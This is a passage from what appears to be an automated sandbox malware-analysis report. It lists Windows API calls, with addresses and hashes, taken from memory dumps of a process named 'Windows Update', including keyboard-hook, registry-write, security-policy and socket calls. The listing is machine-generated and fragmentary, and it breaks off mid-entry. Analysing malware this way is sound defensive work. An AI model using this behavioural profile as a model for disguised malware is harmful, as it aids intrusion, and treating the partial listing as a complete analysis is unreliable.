                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 00642131
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExtentPoint32Text
                                                                                  • String ID:
                                                                                  • API String ID: 223599850-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegSetValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00644B68
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegSetValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00645354
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006401FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0011ABD5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • getsockname.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640EFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: getsockname
                                                                                  • String ID:
                                                                                  • API String ID: 3358416759-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(?,00000E40), ref: 00644563
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011BF31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 006439BE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LsaOpenPolicy.ADVAPI32(?,00000E40), ref: 0011B38F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: OpenPolicy
                                                                                  • String ID:
                                                                                  • API String ID: 2030686058-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateMutexW.KERNEL32(?,?), ref: 00640915
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSAIoctl.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00643501
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Ioctl
                                                                                  • String ID:
                                                                                  • API String ID: 3041054344-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetFileAttributesExW.KERNEL32(?,?,?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0011BBAA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640FDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ioctlsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3577187118-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,?,?,?,?), ref: 0011B990
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011B06C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationToken
                                                                                  • String ID:
                                                                                  • API String ID: 4114910276-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011ACD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CopyFileW.KERNEL32(?,?,?), ref: 00645262
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: f851bc48db1ded841185ea094542270e7f1ba5990ab77f7902ed80bcef98d6fc
                                                                                  • Instruction ID: 841f4a79db7a9902134e628b03c90e8e974900128321babc29557295a546f2d9
                                                                                  • Opcode Fuzzy Hash: f851bc48db1ded841185ea094542270e7f1ba5990ab77f7902ed80bcef98d6fc
                                                                                  • Instruction Fuzzy Hash: 0221A4715093809FD712CF25DC45B93BFE8EF02210F0984EBE985CB263D264D944CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: accept
                                                                                  • String ID:
                                                                                  • API String ID: 3005279540-0
                                                                                  • Opcode ID: a6ef32f3d9fe98131fd40731f2decd06ff67bb9c7a6c1e6a4fde848b62933664
                                                                                  • Instruction ID: 2694258993cf44e0c3e9b493d79655dcac3a2d4514bc3f6d5f16f2eb665fa74a
                                                                                  • Opcode Fuzzy Hash: a6ef32f3d9fe98131fd40731f2decd06ff67bb9c7a6c1e6a4fde848b62933664
                                                                                  • Instruction Fuzzy Hash: E4219DB1500344AFF720DF55DC85BA6FBE8EF09720F14846AED488B242D771A944CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 00640491
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMappingOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1680863896-0
                                                                                  • Opcode ID: 1163d6cfad22b746e7a9db687b5147daa239a0e6621e68c2846312b94e837f34
                                                                                  • Instruction ID: 1ca9593dac2ccf5b748ff21e16760122af6e55f57b0a0ecc5260a09a40f8f3e6
                                                                                  • Opcode Fuzzy Hash: 1163d6cfad22b746e7a9db687b5147daa239a0e6621e68c2846312b94e837f34
                                                                                  • Instruction Fuzzy Hash: 93218E71500740EFF720DF65DC85BAAFBE8EF04310F14846AEE488B282D775A904CA65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetWindowsHookExA.USER32(?,00000E40,?,?), ref: 006418B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: 0e0332efdbd51a6881c5175911ea2017fe4799c830d7db3c05d4727bbb2dbb84
                                                                                  • Instruction ID: c94500d0e1f1ce0325847f12c585e6a2f226aca707c909803e0d83fe023b5edd
                                                                                  • Opcode Fuzzy Hash: 0e0332efdbd51a6881c5175911ea2017fe4799c830d7db3c05d4727bbb2dbb84
                                                                                  • Instruction Fuzzy Hash: 6E212471509340AFD311CF25DC41FA6BFB8EF86720F1581ABEC489B642D235B915CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 00645D0C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePeek
                                                                                  • String ID:
                                                                                  • API String ID: 2222842502-0
                                                                                  • Opcode ID: 1dfe165323b2e6b4507f72d9ce677b7beb1c27c0c253d2be2dfc076de3a61dc8
                                                                                  • Instruction ID: 10e1c033dddc44d6c98a081e8b81a37b2eb3fc6f6fdadc7369255a332008e56d
                                                                                  • Opcode Fuzzy Hash: 1dfe165323b2e6b4507f72d9ce677b7beb1c27c0c253d2be2dfc076de3a61dc8
                                                                                  • Instruction Fuzzy Hash: 5921C3765097809FEB228F25DC44A92FFB4EF07314F0884CEED858F663D265A809DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 0011B8BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Socket
                                                                                  • String ID:
                                                                                  • API String ID: 38366605-0
                                                                                  • Opcode ID: fb2c253663b2a96fd3182d93e39eec025f16a4d0e35d60eb47426931452aaf29
                                                                                  • Instruction ID: 97aea7ec7ff77469d914a11908efb4fdaadaf93e64220961b92a0935bc3b77a4
                                                                                  • Opcode Fuzzy Hash: fb2c253663b2a96fd3182d93e39eec025f16a4d0e35d60eb47426931452aaf29
                                                                                  • Instruction Fuzzy Hash: 2D21A171504704EFEB21DF55DC85B9AFBE8EF08710F14846EEA858A252D375A844CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 006414D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileUnmapView
                                                                                  • String ID:
                                                                                  • API String ID: 2564024751-0
                                                                                  • Opcode ID: c210520770c24a088116d24c98ff3f88546ab29d549ad0302ed9a85b454d8dfa
                                                                                  • Instruction ID: 7ddcc8e116c823cea1df63a3bf4f9a21ca856b110a5567bd4f75dc819178542d
                                                                                  • Opcode Fuzzy Hash: c210520770c24a088116d24c98ff3f88546ab29d549ad0302ed9a85b454d8dfa
                                                                                  • Instruction Fuzzy Hash: 12219D725093C09FE712CB25DC95A92BFB4EF03224F0984EBD8858F263C265A948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 00643ED6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Connect
                                                                                  • String ID:
                                                                                  • API String ID: 3144859779-0
                                                                                  • Opcode ID: 6ec056169879eb623fdb5eb502c88a57e9be6465323fba9d865084dab15cb119
                                                                                  • Instruction ID: b7596eaf4057d09fd62d7d1a63d5138926d2904e392b2f5ed1e847e83dd78c9a
                                                                                  • Opcode Fuzzy Hash: 6ec056169879eb623fdb5eb502c88a57e9be6465323fba9d865084dab15cb119
                                                                                  • Instruction Fuzzy Hash: FA218E71509380AFDB228F55DC44B92FFF4EF06310F08849AE9858B263D336A818DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileView
                                                                                  • String ID:
                                                                                  • API String ID: 3314676101-0
                                                                                  • Opcode ID: 9932f923c4da98040d931874755030266e6949d8f227da7a8a585fd6d80b80e9
                                                                                  • Instruction ID: 3815491fc00478ebcc6ba978471fbffb5fa4dfdbe68ff7652db9b5568dbba586
                                                                                  • Opcode Fuzzy Hash: 9932f923c4da98040d931874755030266e6949d8f227da7a8a585fd6d80b80e9
                                                                                  • Instruction Fuzzy Hash: D621AE71500304EFF721DF55CD85F9AFBE8EF08310F04845AEA899B641D771A905CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • K32GetModuleInformation.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0064542E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationModule
                                                                                  • String ID:
                                                                                  • API String ID: 3425974696-0
                                                                                  • Opcode ID: 06f2584063a9c90b55a3fa8316a7bfc7f45fc5d5c2855ee4ebf1a3b82e064886
                                                                                  • Instruction ID: 718b7de63f8bfc92ae323a8f51b2704ccde4884b35770485458c7448f6858d02
                                                                                  • Opcode Fuzzy Hash: 06f2584063a9c90b55a3fa8316a7bfc7f45fc5d5c2855ee4ebf1a3b82e064886
                                                                                  • Instruction Fuzzy Hash: C611BE71500700EFEB20CF15DC85FAAFBE8EF04721F14846AED09CB292D674E9448AB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • EnumThreadWindows.USER32(?,00000E40,?,?), ref: 0011ADC5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumThreadWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2941952884-0
                                                                                  • Opcode ID: 666b041ba8c3390a25034c56e4bd0c402080a40c19ac0e72e720b800e390f2c4
                                                                                  • Instruction ID: a747cec6fe08254bb2edf79fc06848058eff4aadb82383fed6cced5e4be45a24
                                                                                  • Opcode Fuzzy Hash: 666b041ba8c3390a25034c56e4bd0c402080a40c19ac0e72e720b800e390f2c4
                                                                                  • Instruction Fuzzy Hash: 5521E472509380AFD311CB25DC41F66BFB4EF87610F0981DFE8888B253D225B918CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenCurrentUser.KERNEL32(?,00000E40), ref: 006436BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentOpenUser
                                                                                  • String ID:
                                                                                  • API String ID: 1571386571-0
                                                                                  • Opcode ID: e6ae40c410f7d4b57cdba9995e3ddd36a6e409e89a6a20c9df06b1bd84df6149
                                                                                  • Instruction ID: 56d7624737b6430f2cd296f7582c9841a09d23e0b392fd661e22deb927501f37
                                                                                  • Opcode Fuzzy Hash: e6ae40c410f7d4b57cdba9995e3ddd36a6e409e89a6a20c9df06b1bd84df6149
                                                                                  • Instruction Fuzzy Hash: F911C4B1500304EFFB20DF54DC85FAAFBA8EF04760F14846AFD449B342D675A9058AB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegNotifyChangeKeyValue.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006438C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeNotifyValue
                                                                                  • String ID:
                                                                                  • API String ID: 3933585183-0
                                                                                  • Opcode ID: eb525f2a24c660de8aa2773c210409bcdcf612a77694ac291a4597f91a1b6454
                                                                                  • Instruction ID: 36721dbcbd3b42aaf8f986edc23f3bbdf648e95cc82ae162f72116e0daacf34f
                                                                                  • Opcode Fuzzy Hash: eb525f2a24c660de8aa2773c210409bcdcf612a77694ac291a4597f91a1b6454
                                                                                  • Instruction Fuzzy Hash: EB11D072400304EFEB21CF51CC85FAAFBECEF04720F14896AF9499B241D671AA048BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegSetValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00645354
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: b6d8502abf13751f191766b14361822659d90ad00d10904fc7fd6b49507f2eaf
                                                                                  • Instruction ID: 9160a85aad12c14f6044361d7ea9de2f1f24fe9ee59283331b1107c30268ea3c
                                                                                  • Opcode Fuzzy Hash: b6d8502abf13751f191766b14361822659d90ad00d10904fc7fd6b49507f2eaf
                                                                                  • Instruction Fuzzy Hash: 40119072500B00EFEB218E11CC85FA7FBE8EF04750F14855AED469B642E6B1E905CAB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 00641A05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadShim
                                                                                  • String ID:
                                                                                  • API String ID: 1475914169-0
                                                                                  • Opcode ID: 5fdf2c5c09808cd0d38d33c56bb734b1d0c9065d9c52082ec03734d6a2f2f44b
                                                                                  • Instruction ID: ec311c5c88647597e4aae92637dfad691d712ad21c7d1102cab61b71b01b11f9
                                                                                  • Opcode Fuzzy Hash: 5fdf2c5c09808cd0d38d33c56bb734b1d0c9065d9c52082ec03734d6a2f2f44b
                                                                                  • Instruction Fuzzy Hash: C3219071509380AFE722CB15DC45BA2BFA8EF16314F08809AED848B253D265A949CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006401FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 1ee66d5947391a50499f77d1c50208665d03cc785212632d25f26bd89a9cecb1
                                                                                  • Instruction ID: 787a1d4642e036ae2aaa602f84516b9d6434eed537f1d802431ab0c77b3e8749
                                                                                  • Opcode Fuzzy Hash: 1ee66d5947391a50499f77d1c50208665d03cc785212632d25f26bd89a9cecb1
                                                                                  • Instruction Fuzzy Hash: 05117C72500700AFFB21CE55DC85FA7BBE8EF04720F04855AEA459B691D670E949CA71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetProcessTimes.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640BD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessTimes
                                                                                  • String ID:
                                                                                  • API String ID: 1995159646-0
                                                                                  • Opcode ID: bd91ceafce1db220ac35915cbce7bff40a8abcb0b1375bcec486e9e90313d483
                                                                                  • Instruction ID: 5b8628522e4509ced70742c2aa217db4dee698512092b9dd67009975077140a6
                                                                                  • Opcode Fuzzy Hash: bd91ceafce1db220ac35915cbce7bff40a8abcb0b1375bcec486e9e90313d483
                                                                                  • Instruction Fuzzy Hash: 9211EF72100704EFFB21CF61DC85FAAFBA8EF04320F04856AEA098B241D671A9448BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • K32EnumProcessModules.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006450E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumModulesProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1082081703-0
                                                                                  • Opcode ID: c1149b8584ff6ce555e6965d1d50e79d9939b8c196d27b34146011919310e8fd
                                                                                  • Instruction ID: 8e3ce8151f97ee352beb7b34cd6426f9a067b009b2d07e1f3107f2eb4bd34575
                                                                                  • Opcode Fuzzy Hash: c1149b8584ff6ce555e6965d1d50e79d9939b8c196d27b34146011919310e8fd
                                                                                  • Instruction Fuzzy Hash: 8F11C172500700EFFB21DF55DC85FAAFBA8EF04720F14846AFD4A9B641D671A9048BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSAEventSelect.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006411C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: EventSelect
                                                                                  • String ID:
                                                                                  • API String ID: 31538577-0
                                                                                  • Opcode ID: 617146458d2b5eccb6f6b3098fb53e13dc35f2a410a4bde4d68013564b897fb9
                                                                                  • Instruction ID: 1a15b3dbe0e1a7670603d53530ab282bf1ae48093baef81b0ec4b83a83f3f0ce
